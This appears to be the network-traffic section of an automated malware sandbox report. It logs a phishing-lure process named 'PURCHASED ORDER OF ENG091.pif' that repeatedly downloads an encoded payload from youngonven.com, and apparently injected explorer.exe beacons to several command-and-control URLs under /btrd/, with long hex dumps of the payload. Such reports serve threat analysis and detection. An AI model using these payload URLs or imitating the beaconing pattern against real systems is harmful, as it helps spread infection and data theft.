Oct 8, 2024 11:31:04.899350882 CEST	1236	IN	Data Raw: 48 ee 45 41 f2 49 3d f3 66 97 68 c7 6a ca 6c 91 5e c0 60 bf 62 95 64 cd c7 a2 38 09 3a 0c 66 91 5f 61 64 61 91 63 64 a5 57 4e 5a a5 59 51 a6 4d 9e 56 55 5b 53 59 50 b9 80 89 85 87 86 87 88 84 81 83 ad b2 b2 7d 93 6d 94 95 b8 be c5 bb c9 cc 80 a3 Data Ascii: HEAI=fhjl^`bd8:f_adacdWNZYQMVU[SYP}m`USMQQjie^]`w\|mrs%,$ :559430G;68CECD(,%'%"#))
Oct 8, 2024 11:31:04.899434090 CEST	1236	IN	Data Raw: 40 f1 fa 25 d6 1d da d5 28 d7 28 ce d2 1d cf cf 1e d3 20 1c 17 e9 19 15 e9 e7 11 0f 0e 0d 10 1b 13 10 e1 f9 3f 3e f9 44 f6 f7 46 3f 42 44 46 3d 3f ed 44 3b 3b 0b 35 0a 36 3a 06 01 32 fe 34 32 32 04 fd 68 60 6b 69 6a 64 67 96 62 63 66 91 94 93 8e Data Ascii: @%(( ?>DF?BDF=?D;;56:2422h`kijdgbcfb\VMMXZWRTNNNPymw{womnnrmW\\ZYNMPOTl^{rmt}},)%%!" "7::333.
Oct 8, 2024 11:31:04.899468899 CEST	1236	IN	Data Raw: db d5 d5 db 2a 2a 29 d7 d0 22 24 21 db cd da 06 36 36 06 39 03 01 01 34 01 2f 06 2d 31 ff 09 45 47 f6 49 f3 f5 f5 f8 f2 f2 41 13 46 2d ef ee 06 db e9 0a d3 ea d6 d9 d3 ed dc dc df cf e9 de 19 10 17 16 1b 19 e6 ec 11 e2 0e df 1c 13 e3 10 45 fc 48 Data Ascii: **)"$!6694/-1EGIAF-EHIEHBBC@K>A6-::.-<2-:_`fgfOUVQ~~\|wQlZ^gUSQQMglfj`cc{zxxsqt~}
Oct 8, 2024 11:31:04.899502993 CEST	672	IN	Data Raw: 7a c7 c9 bd 73 c5 74 6d 72 c1 6d 89 b9 86 89 87 b7 b1 8c 84 b8 b2 84 7d 7f b4 83 e6 16 e6 e9 e6 e9 17 eb 11 e1 e5 0d dd 10 e2 e2 db 25 29 2a 29 2b 2b d6 ce d0 d3 cf 24 23 1d cf 3c 95 81 06 0c 3b 37 36 fd 34 2f 23 3c 36 30 2e 40 42 4c 37 48 f5 fb Data Ascii: zstmrm}%)*)++$#<;764/#<60.@BL7HBA&+$"#"HLHKB>5852-/14keljke]a]abd[UVPUPPywwmsntytXYWTNTil
Oct 8, 2024 11:31:04.899538040 CEST	1236	IN	Data Raw: 67 97 62 93 62 64 91 60 6b 5e 63 56 a5 5b 58 55 56 57 a8 58 a4 a3 51 9d 52 4f 53 80 b5 7e ba bc b6 b7 b9 81 7d b1 81 af af 84 89 6f cb 27 05 73 c7 c7 71 c3 c3 be 75 bf c3 70 71 5b a7 9d 5c 57 59 a8 a8 9d 53 a5 a1 a1 ab a2 a9 9a 98 9c 97 9a 67 91 Data Ascii: gbbd`k^cV[XUVWXQROS~}o'squpq[\WYSge]d^uyqq,',!";602KEGGB@?'*#,&"#""GIFLDLC>?KJC71;
Oct 8, 2024 11:31:04.899574041 CEST	1236	IN	Data Raw: df cd e5 25 df e6 e9 0b 0c fa 08 2d f3 f0 fc 44 ed 44 ed 4c 3e f3 3d 06 0b 09 39 3c 07 07 31 37 33 2d 01 3c 2f 3a 06 98 a5 a9 6b 9c 63 96 62 91 5f 65 a2 9f 98 8f 63 a5 55 59 4d 5c 5c 5b ab 53 a4 4e a4 5b 50 51 5a 8b ba b7 7d b8 b7 8a 89 84 7d 7e Data Ascii: %-DDL>=9<173-</:kcb_ecUYM\\[SN[PQZ}}~}vmzv{zqpmppPliYi[Slfgf]a`l]yzttnoo+,(!%+" ;;<-0-3KHLEFK==?C +',"'&!
Oct 8, 2024 11:31:04.899610043 CEST	1236	IN	Data Raw: 2e 2f 30 fa 46 49 fa fa 48 f8 fa 3e f8 ef ee f4 f2 f4 ee 2c 2a 2c 1e 24 11 0e 10 d4 f3 d1 1f 23 2c 1f d3 e8 16 ea ea 15 1a 15 15 10 e4 0e 13 dd 0f 10 de fb 4c 46 4b f8 43 4a 42 40 3d 3f f0 f2 4b 3e 40 39 0a 45 1d 21 1f 3c 37 04 33 02 ff 01 33 04 Data Ascii: ./0FIH>,*,$#,LFKCJB@=?K>@9E!<733-_]kik]ad^b[W[T\XST~}{pnz\|urqXihTNXRQQTeljg_Od{\|zo;(C ","(+ !
Oct 8, 2024 11:31:04.903893948 CEST	1236	IN	Data Raw: e7 de e6 e3 ea e8 e8 df e2 e5 14 e2 12 dd e2 2b 27 ce 29 d7 26 dc 2c d2 cd d6 d3 1d 1f 27 11 4c 3b 4a 39 37 fc 44 0a 4c 02 06 ff 03 2f 2d 04 f5 47 f6 f8 49 47 f1 f5 ed f0 f4 ef 42 fb f2 f2 d6 06 fa f7 05 1c e4 2a ec d3 1f 1d 1d 20 1d d3 1b 19 1b Data Ascii: +')&,'L;J97DL/-GIGB* ?JJECLE=@D;5:;:73131-1jlhfh^]c`YW[WMOTP~}wwzvqnnoY[QROOQOjjilccad_c^zut

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49992	34.205.242.146	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:31:04.924664974 CEST	172	OUT	GET /btrd/?orD=Eh2Xpu8l9dqABVqMRkelxcAdaQWRauo4zIVE3zjkUJjpFQNmsYxfVbqaI7I2lWlUEjDmoepSbg==&8pn=ChvLWF0pZdjL9 HTTP/1.1 Host: www.pure1027.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 8, 2024 11:31:05.406030893 CEST	170	IN	HTTP/1.1 302 Found content-length: 0 date: Tue, 08 Oct 2024 09:31:05 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=pure1027.com connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49993	63.250.38.167	80	2704	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:31:12.576649904 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:31:13.272907019 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:31:13 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:31:13.272973061 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:31:13.273006916 CEST	1236	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:31:13.273025036 CEST	1236	IN	Data Raw: 3c 31 39 9b 6c 97 95 6b 9a 67 66 61 5e 62 92 5e 92 5f 60 56 58 57 a9 5a aa ab 6c 5f 69 91 5e b1 bf c0 b7 a6 9e 75 73 95 7c 70 96 6f 6e b2 ad 7d b3 7e 7f 76 77 87 77 77 ca c7 75 73 bd c3 6e 71 73 72 c3 aa 9f 56 57 50 58 99 9a 9a 4d 8d 6f 56 64 6a Data Ascii: <19lkgfa^b^_`VXWZl_i^us\|pon}~vwwwusnqsrVWPXMoVdjll^uxtmqprt,),%+%::9;121:87H:7I>B=)),&%!"$*HLGJECB
Oct 8, 2024 11:31:13.273045063 CEST	896	IN	Data Raw: e6 0d ea 06 e7 d5 0c d8 d4 e2 cf 0e 0e 12 dd fb fb 45 f5 47 48 41 fb ee 44 46 ed f2 f1 41 3d 3c 36 3b 38 3b 3c 06 3a 30 31 2f 2d e8 03 f3 f3 8f 97 91 97 98 96 67 66 67 60 61 91 91 62 69 5e a9 55 57 59 56 a9 56 a5 a1 50 53 a4 9d a2 a3 53 8a bc 8a Data Ascii: EGHADFA=<6;8;<:01/-gfg`abi^UWYVVPSS}vv\|uut{wrrrpTNMea^_{\|ptqtpA<!59::-.LFHELHC%
Oct 8, 2024 11:31:13.273077965 CEST	1236	IN	Data Raw: 8f 99 99 98 9a 9a 9c 98 63 95 60 90 9b 99 63 cb bf c8 7a c4 76 c6 c6 c7 c4 bd 72 72 c0 be be b5 86 b6 88 b6 88 8b 86 7d af 80 b0 b4 ae 5c 7b e7 e8 e5 e8 ec e8 3a ea dc e0 dd de e3 d7 e1 e2 d7 d8 e2 47 db dc d9 dd cf d0 cd ce d3 d4 d1 d2 07 08 09 Data Ascii: c`czvrr}\{:G@><>#?6D.KA/IG.4&5=,+JKKFLDBC978;4343133khaecekbiPYMYTUWTTRMNQ~xoprtY
Oct 8, 2024 11:31:13.273113012 CEST	1236	IN	Data Raw: b6 85 87 7f af 85 b1 82 83 81 b1 c5 ca c6 77 76 cb c5 71 73 74 c3 bd 70 6d c4 74 ab 9f a7 ac 57 a8 a9 59 51 9e 4f a2 a3 52 9f 9f 65 66 8e 9c 6c 69 95 65 60 5e 91 62 61 63 5d 9a 79 c8 cb 75 c8 c5 cb 79 71 bd 6f c6 74 c2 ca c2 ba 8a ae bc bc bc 8b Data Ascii: wvqstpmtWYQOReflie`^bac]yuyqot+&%%" <6..4EFIIGID@B+$((""!JHFJJGF=0<4.36--/jijhgbbd`k^cV[XUVW
Oct 8, 2024 11:31:13.273150921 CEST	1236	IN	Data Raw: 31 ff fd fd 3b 02 00 96 6a 5e 99 97 64 62 95 63 5d 64 64 62 90 63 5f 56 a7 a7 5a a5 a8 a7 55 53 52 53 a0 5c 54 a2 9e b9 88 85 ba 8a ba bb bb b0 88 b3 7d b4 b1 7e 81 cc 76 6d 6d 78 75 71 cc 73 6e be 75 c2 c2 c4 c1 a8 a9 5b a6 ab 5a a9 ab a4 9f a2 Data Ascii: 1;j^dbc]ddbc_VZUSRS\T}~vmmxuqsnu[ZPSRfrjVdzv\|{ptrmq%*' 5:95<4303LIJJACA@>))((, !!"%-DD
Oct 8, 2024 11:31:13.273195982 CEST	1236	IN	Data Raw: 22 d4 d4 ec 1a 17 18 e9 15 ec 1a 18 0e 0d e2 13 f0 e9 dd 37 06 fa 05 08 f7 0c 06 2f f7 00 2e 00 f6 ed ed f5 f5 f9 03 fe 08 3d 4a fd f3 f1 3e 0c f0 41 0a 98 a5 55 98 98 97 8f 5a 9d 93 93 a1 a2 8f 8d 52 a2 96 65 a5 aa a9 a6 9b 8e 60 a6 8f 63 a6 a8 Data Ascii: "7/.=J>AUZRe`cwy{uuxrosmMYjVkZc_OPcMX[jWWgecibOfhN{}mtm4,*#$895/./0FIH>
Oct 8, 2024 11:31:13.273230076 CEST	328	IN	Data Raw: 3c 05 05 39 3b 07 39 00 32 fd 30 02 01 00 ff fa f8 32 f9 f3 f9 45 f9 f1 f2 40 40 44 ee f3 3e 26 1f d8 1d d5 26 d6 d9 20 1d 1d cf cf 1d 29 d3 15 19 e7 1c 14 ea e5 15 0e 18 0e 0d dd 12 14 10 3f 3f 4b d9 03 f9 f6 0a 03 f7 fc fc 33 f1 f8 f8 01 0b 08 Data Ascii: <9;9202E@@D>&& )??K3J=Albibdak`ab\XUYXOOPSy\|xqqxvrqzYvpshhTfii]b_a^x{u{\|rpot+')
Oct 8, 2024 11:31:13.273269892 CEST	1236	IN	Data Raw: f2 f0 45 ef 3d 40 44 0b 3b 35 08 3a 3b 3a 05 37 04 33 31 33 31 2d 31 95 6a 6c 68 66 68 95 98 94 5e 93 5d 63 60 92 91 a5 59 57 5b a7 57 ab a8 a0 4d 4f a2 54 a0 50 9e b9 ba 7e 7d 85 b6 87 82 81 b3 b3 85 80 ae af b3 cc 77 77 c7 7a 76 71 c9 be 6e 6e Data Ascii: E=@D;5:;:73131-1jlhfh^]c`YW[WMOTP~}wwzvqnnoY[QROOQOjjilccad_c^zut'+($#68LKF@D>'#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49995	104.21.93.17	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:31:25.217078924 CEST	177	OUT	GET /btrd/?8pn=ChvLWF0pZdjL9&orD=1hanRQkKsw2EpQWVKCl4LROlWZtcCFpSARtuzqwGSwLi36Og4ncRpLu12qyBMcT+6ho6oQQ/oA== HTTP/1.1 Host: www.thecolourgrey.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49996	63.250.38.167	80	6648	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:31:25.587169886 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:31:26.212222099 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:31:26 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:31:26.212300062 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:31:26.212336063 CEST	1236	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:31:26.212368965 CEST	672	IN	Data Raw: 3c 31 39 9b 6c 97 95 6b 9a 67 66 61 5e 62 92 5e 92 5f 60 56 58 57 a9 5a aa ab 6c 5f 69 91 5e b1 bf c0 b7 a6 9e 75 73 95 7c 70 96 6f 6e b2 ad 7d b3 7e 7f 76 77 87 77 77 ca c7 75 73 bd c3 6e 71 73 72 c3 aa 9f 56 57 50 58 99 9a 9a 4d 8d 6f 56 64 6a Data Ascii: <19lkgfa^b^_`VXWZl_i^us\|pon}~vwwwusnqsrVWPXMoVdjll^uxtmqprt,),%+%::9;121:87H:7I>B=)),&%!"$*HLGJECB
Oct 8, 2024 11:31:26.212407112 CEST	1236	IN	Data Raw: 1e 22 d2 07 37 3a 0c 09 04 3a 09 33 33 fe 06 00 33 fe 2e 48 ef ee fb f7 f5 4a fa f7 ed ef 3f f2 f4 44 43 2a da 2a 26 25 23 d7 d8 27 24 1e 23 d1 1f ce 1e 17 eb 0d 0d 13 14 1c e9 12 de 0f 0e 1c e0 f3 dd fa d7 08 f1 2d f7 01 f5 f1 43 46 ef 4c f2 ed Data Ascii: "7::333.HJ?DC**&%#'$#-CFL9/55593035390_fgeb``dWYZYPTSPPOZ~on}un\|x\|qrrosqn\XYUMQTQhikeacuxzwqmqs
Oct 8, 2024 11:31:26.212441921 CEST	1236	IN	Data Raw: bb b6 ba 8c b4 bb bb b1 84 ad b0 b3 80 7e 7d 16 df e8 18 1a 35 16 26 43 18 1f 11 14 10 34 17 21 1c 2a 0e 17 2a 2c 2c d8 1d d3 cf dc d0 24 d4 38 09 07 35 35 37 3b 01 2d 2e 00 31 2d fe 34 30 fb 47 46 45 49 49 f2 4b ee 43 f6 41 ed ee f4 f9 20 d6 d6 Data Ascii: ~}5&C4!**,,$8557;-.1-40GFEIIKCA 'HJGGC@@@CC=9:-b_ci\[MTZYPRTNrrtq{tnnUc`cz
Oct 8, 2024 11:31:26.212474108 CEST	1236	IN	Data Raw: a5 57 a6 a1 54 4e a2 54 ac a3 a2 97 95 98 69 9a 96 6c 98 8d 5f 60 8f 5d 8f 91 93 c0 c5 ca 79 cc c6 c5 76 71 c2 c6 be be bf ca 71 88 8a ba 85 ba b7 8c b7 b7 b0 83 b3 7d b0 82 b3 e6 ea dd 18 e6 1b 16 e2 df 12 df e0 df 0e 14 0d d9 2c d7 2c d4 2a 2c Data Ascii: WTNTil_`]yvqq},,,#"6:042EJG?C+!, JJA==FC?@7-;777230./gfkjg^h`_c^cNUVQTTSwvq
Oct 8, 2024 11:31:26.212507010 CEST	1236	IN	Data Raw: 54 51 9d 51 a2 5a 52 86 7f 89 b9 86 8a 8b 87 b0 83 85 7e 80 83 ad b3 c8 75 c9 76 ca 79 ca c8 6f 71 76 c4 72 6d 74 72 55 a8 58 9e 57 58 57 a9 a7 52 52 9d a2 a0 52 4e 97 6c 69 6a 98 67 92 6b 98 62 63 96 91 94 63 93 c9 ca c5 c8 c9 7b 7a c1 bf 6f c5 Data Ascii: TQQZR~uvyoqvrmtrUXWXWRRRNlijgkbcc{zop~))+!.;6;878../3GF=@A &( )FJIHG=CF?8:7:1;j^dbc]dd
Oct 8, 2024 11:31:26.212542057 CEST	1236	IN	Data Raw: f1 fa f0 f0 48 06 46 02 07 f2 4a 01 09 ef 3e ef 0c fe 42 92 a8 9a a8 9c a8 92 8f 99 5a c1 96 90 54 a4 8d a6 9b 97 9d 97 93 69 a3 a4 97 5d 8e 91 a5 8f a9 bb bb b9 76 b4 c9 79 b0 ba c4 6d ad c0 c0 b9 b7 b5 bf af c9 c7 8c b5 bf 7f b0 c2 b0 bd c5 b3 Data Ascii: HFJ>BZTi]vymlMMjPjT^Nb\UWhjgh_cxymmsm}K)*%!!!)'$!!FI.8I9H;2<?:C6J58C;EC1K43G""
Oct 8, 2024 11:31:26.212580919 CEST	1236	IN	Data Raw: 26 d8 28 dc d6 da 29 d0 1f 22 d2 23 cf d2 d4 17 ea 1c 15 13 17 e7 16 10 e4 e0 df 14 13 de e0 4b 4c 4a 4b 43 4c 48 48 41 43 f4 f1 ff e5 40 f4 2f 0c 06 3c 39 0b d4 3b 31 31 36 36 33 ff 34 3a 5f 67 9b 5d 9c 9b 9b 6c 68 93 61 63 6c 5e 62 6a 5a 50 aa Data Ascii: &()"#KLJKCLHHAC@/<9;116634:_g]lhacl^bjZPVW[[NRMMNRMf}us\|vuuzm\WYUVVQeOOfef`a{vq~})%(%'+"5<9;9202
Oct 8, 2024 11:31:26.217520952 CEST	1236	IN	Data Raw: d9 da 2b cf d3 23 24 d1 cf d9 20 00 00 fe 37 3a 0b 0b 3b 03 2f 2e 3f 3f 33 3d 3d 36 f9 f7 fa 45 fb 4c f9 40 f4 42 40 fc f0 f3 41 d8 20 2b 25 da d9 2b dc ce 1d d2 1f 1e 23 cd 23 1c ec 1b 1a ec e8 18 ec 0d dd 13 15 e2 1c de dd fc fa 4b fc 47 f9 4c Data Ascii: +#$ 7:;/.??3==6EL@B@A +%+##KGLJDK>D;752.34;/.eieec`^li_OVSZRMNVRMNTnzppqppYVZVPQfelfbbO[Q]x{sr

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.6	49997	63.250.38.167	80

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:31:33.696810007 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:31:34.338495016 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:31:34 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:31:34.338522911 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:31:34.338537931 CEST	1236	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:31:34.338551044 CEST	1236	IN	Data Raw: 3c 31 39 9b 6c 97 95 6b 9a 67 66 61 5e 62 92 5e 92 5f 60 56 58 57 a9 5a aa ab 6c 5f 69 91 5e b1 bf c0 b7 a6 9e 75 73 95 7c 70 96 6f 6e b2 ad 7d b3 7e 7f 76 77 87 77 77 ca c7 75 73 bd c3 6e 71 73 72 c3 aa 9f 56 57 50 58 99 9a 9a 4d 8d 6f 56 64 6a Data Ascii: <19lkgfa^b^_`VXWZl_i^us\|pon}~vwwwusnqsrVWPXMoVdjll^uxtmqprt,),%+%::9;121:87H:7I>B=)),&%!"$*HLGJECB
Oct 8, 2024 11:31:34.338563919 CEST	1236	IN	Data Raw: e6 0d ea 06 e7 d5 0c d8 d4 e2 cf 0e 0e 12 dd fb fb 45 f5 47 48 41 fb ee 44 46 ed f2 f1 41 3d 3c 36 3b 38 3b 3c 06 3a 30 31 2f 2d e8 03 f3 f3 8f 97 91 97 98 96 67 66 67 60 61 91 91 62 69 5e a9 55 57 59 56 a9 56 a5 a1 50 53 a4 9d a2 a3 53 8a bc 8a Data Ascii: EGHADFA=<6;8;<:01/-gfg`abi^UWYVVPSS}vv\|uut{wrrrpTNMea^_{\|ptqtpA<!59::-.LFHELHC%
